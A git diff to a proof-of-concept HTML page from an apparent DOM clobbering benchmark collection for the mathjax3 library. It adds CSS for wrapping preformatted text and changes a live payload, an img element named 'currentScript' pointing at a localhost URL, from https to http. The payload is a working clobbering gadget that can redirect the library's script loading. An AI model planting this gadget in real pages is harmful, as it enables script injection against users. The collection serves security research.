--- a/domc-gadgets-assets/gadgets/mathjax3/poc.html
+++ b/domc-gadgets-assets/gadgets/mathjax3/poc.html
@@ -5,6 +5,16 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>DOM Clobbering Micro Benchmarks</title>
     <link rel="stylesheet" href="../styles/styles.css">
+    <style>
+        /* Ensure that long lines in <pre> tags wrap */
+        pre {
+            white-space: pre-wrap;       /* CSS3 */
+            white-space: -moz-pre-wrap;  /* Mozilla */
+            white-space: -pre-wrap;      /* Opera 4-6 */
+            white-space: -o-pre-wrap;    /* Opera 7 */
+            word-wrap: break-word;       /* IE */
+        }
+    </style>
 </head>
 <body>
 <h1>DOM Clobbering Collection - mathjax3</h1>
@@ -12,8 +22,8 @@
 <section class="section">
   <div class="column">
   <p><span class="label">Payload</span><br><br>
-  <pre>&lt;img name=&quot;currentScript&quot; src=&quot;https://localhost:9999&quot;&gt;&lt;/img&gt;</pre>
-  <img name="currentScript" src="https://localhost:9999"></img>
+  <pre>&lt;img name=&quot;currentScript&quot; src=&quot;http://localhost:9999&quot;&gt;&lt;/img&gt;</pre>
+  <img name="currentScript" src="http://localhost:9999"></img>
   </div>
 </section>
 
